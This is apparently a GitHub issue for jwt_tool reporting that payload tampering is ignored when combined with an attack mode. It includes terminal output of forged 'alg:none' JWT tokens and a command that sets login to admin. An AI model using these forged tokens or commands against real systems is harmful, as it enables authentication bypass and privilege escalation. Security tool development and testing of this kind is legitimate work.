jwt_tool icon indicating copy to clipboard operation
jwt_tool copied to clipboard

Published 20 hours ago verified publisher icon ticarpi

tempering is ignored when combined with an attack

Open noraj opened this issue 3 years ago • 1 comments

When combining temper + an attack, the output token is the original token + the attack, the tempering is ignored.

For example:

$ jwt-tool eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXUyJ9.eyJsb2dpbiI6Im5vcmFqIiwiaWF0IjoiMTY2NTI1NDU4MyJ9.OTgxOGE0YWE5Y2UyYTQ5N2FlMzZlZmMwZTIxOGIwOTFhZDdjOTRlYWE4MDFkMWJlOTgwN2E1NTkxMzAzMGMwYw -T -X a

...

Token payload values:
[1] login = "noraj"
[2] iat = 1665254583    ==> TIMESTAMP = 2022-10-08 20:43:03 (UTC)
[3] *ADD A VALUE*
[4] *DELETE A VALUE*
[5] *UPDATE TIMESTAMPS*
[0] Continue to next step

Please select a field number:
(or 0 to Continue)
> 1

Current value of login is: noraj
Please enter new value and hit ENTER
> admin 
[1] login = "admin"
[2] iat = 1665254583    ==> TIMESTAMP = 2022-10-08 20:43:03 (UTC)
[3] *ADD A VALUE*
[4] *DELETE A VALUE*
[5] *UPDATE TIMESTAMPS*
[0] Continue to next step

Please select a field number:
(or 0 to Continue)
> 0
jwttool_5f095c12269a0436e321cc1cff90399b - EXPLOIT: "alg":"none" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJub25lIiwidHlwIjoiSldTIn0.eyJsb2dpbiI6Im5vcmFqIiwiaWF0IjoiMTY2NTI1NDU4MyJ9.
jwttool_e67565a408b902fbaee7f0551345ceec - EXPLOIT: "alg":"None" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJOb25lIiwidHlwIjoiSldTIn0.eyJsb2dpbiI6Im5vcmFqIiwiaWF0IjoiMTY2NTI1NDU4MyJ9.
jwttool_09935cb7b6cadff540561326dd3688d1 - EXPLOIT: "alg":"NONE" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJOT05FIiwidHlwIjoiSldTIn0.eyJsb2dpbiI6Im5vcmFqIiwiaWF0IjoiMTY2NTI1NDU4MyJ9.
jwttool_e8a178e70ccfaab8ad7ff0ae90add944 - EXPLOIT: "alg":"nOnE" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJuT25FIiwidHlwIjoiSldTIn0.eyJsb2dpbiI6Im5vcmFqIiwiaWF0IjoiMTY2NTI1NDU4MyJ9.

The outputed token contains user noraj and not admin.

noraj avatar Oct 08 '22 18:10 noraj

I know I can use this:

$ jwt-tool eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXUyJ9.eyJsb2dpbiI6Im5vcmFqIiwiaWF0IjoiMTY2NTI1NDU4MyJ9.OTgxOGE0YWE5Y2UyYTQ5N2FlMzZlZmMwZTIxOGIwOTFhZDdjOTRlYWE4MDFkMWJlOTgwN2E1NTkxMzAzMGMwYw -X a -pc login -pv admin -I

noraj avatar Oct 08 '22 18:10 noraj